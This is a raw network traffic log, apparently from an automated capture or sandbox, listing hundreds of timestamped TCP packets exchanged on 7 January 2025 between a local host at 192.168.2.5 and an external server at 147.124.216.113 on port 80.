Jan 7, 2025 13:25:01.573518991 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.573544979 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.573544979 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.573597908 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.573668957 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.573682070 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.573693991 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.573736906 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.573745012 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.573757887 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.573771000 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.573787928 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.573822975 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.573822975 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.573858976 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.573873043 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.573884964 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.573895931 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.573930979 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.573971033 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.574244976 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.574256897 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.574270010 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.574280977 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.574290991 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.574292898 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.574333906 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.574503899 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.582612038 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.582639933 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.582653999 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.582685947 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.582703114 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.582710981 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.582715988 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.582730055 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.582741022 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.582799911 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.582811117 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.582813025 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.582813025 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.582823992 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.582840919 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.582870960 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.582957983 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.582976103 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.582989931 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.583013058 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.583049059 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.583086967 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.583117962 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.583128929 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.583142042 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.583178997 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.583178997 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.583215952 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.583257914 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.583271027 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.585064888 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.585078955 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.585093021 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.585144997 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.585144997 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.585205078 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.585216999 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.585232973 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.585244894 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.585254908 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.585289955 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.585289955 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.631757975 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.631809950 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.631823063 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.631834984 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.631850004 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.631871939 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.631884098 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.631896973 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.631917953 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.631930113 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.631931067 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.631942034 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.631954908 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.631967068 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.631978989 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.632004976 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.632026911 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.632072926 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.632086039 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.632098913 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.632110119 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.632124901 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.632138014 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.632148027 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.632199049 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.632221937 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.632251024 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.632271051 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.632288933 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.632301092 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.632314920 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.632319927 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.632319927 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.632340908 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.632348061 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.632354021 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.632369995 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.632386923 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.632395983 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.632410049 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.632441998 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.632453918 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.632456064 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.632456064 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.632539034 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.632652044 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.632674932 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.632687092 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.632735014 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.632760048 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.632772923 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.632785082 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.632797956 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.632823944 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.632838964 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.632939100 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.632951975 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.632963896 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.632976055 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.632987976 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.633002043 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.633023977 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.633023977 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.633028984 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.633043051 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.633054972 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.633065939 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.633070946 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.633070946 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.633115053 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.661912918 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.661947966 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.661961079 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.661973000 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.661984921 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.661986113 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.662002087 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.662024975 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.662036896 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.662055969 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.662059069 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.662081003 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.662092924 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.662105083 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.662117004 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.662117004 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.662130117 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.662142992 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.662143946 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.662158966 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.662188053 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.662194014 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.662206888 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.662220001 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.662255049 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.662280083 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.662292957 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.662305117 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.662317038 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.662373066 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.662373066 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.662465096 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.662494898 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.662508011 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.662517071 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.662580967 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.662595034 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.662606955 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.662610054 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.662622929 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.662645102 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.662662029 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.662676096 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.662699938 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.662712097 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.662722111 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.662725925 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.662739992 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.662796021 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.662965059 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.662991047 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.663024902 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.671387911 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.671417952 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.671430111 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.671462059 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.671475887 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.671500921 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.671530962 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.671544075 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.671547890 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.671560049 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.671588898 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.671627998 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.671657085 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.671668053 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.671709061 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.671736002 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.671746969 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.671837091 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.671848059 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.671861887 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.671875000 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.671885967 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.671906948 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.671926975 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.671976089 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.672112942 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.672126055 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.672138929 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.672149897 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.672162056 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.672173023 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.672182083 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.672226906 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.673834085 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.673861980 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.673872948 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.673897028 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.673908949 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.673924923 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.673978090 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.674019098 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.674031973 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.674043894 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.674055099 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.674074888 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.674102068 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.720523119 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.720535994 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.720607042 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.720619917 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.720628023 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.720653057 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.720665932 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.720685005 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.720690966 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.720700026 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.720711946 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.720732927 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.720793962 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.720793962 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.720853090 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.720865011 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.720877886 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.720916033 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.720932007 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.720944881 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.720964909 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.720976114 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.720982075 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.721038103 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.721174002 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.721194029 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.721208096 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.721250057 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.721262932 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.721268892 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.721272945 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.721321106 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.721321106 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.721347094 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.721362114 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.721373081 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.721414089 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.721438885 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.721590996 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.721607924 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.721620083 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.721654892 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.721724987 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.721740007 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.721745968 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.721780062 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.721791983 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.721805096 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.721807003 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.721816063 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.721828938 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.721843004 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.721843958 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.721884966 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.721894026 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.721910000 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.721923113 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.721934080 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.721945047 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.721956015 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.721966028 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.721995115 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.722296953 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.722325087 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.722338915 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.722347021 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.722379923 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.722379923 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.722403049 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.722415924 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.722471952 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.722579002 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.722821951 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.750515938 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.750538111 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.750592947 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.750636101 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.750648975 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.750660896 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.750698090 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.750725031 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.750737906 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.750755072 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.750766993 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.750799894 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.750808001 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.750838041 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.750849962 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.750858068 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.750858068 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.750902891 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.750907898 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.750921965 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.750973940 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.750984907 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.750984907 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.750998974 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.751033068 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.751179934 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.751209021 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.751220942 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.751261950 CET	49710	80	192.168.2.5	147.124.216.113
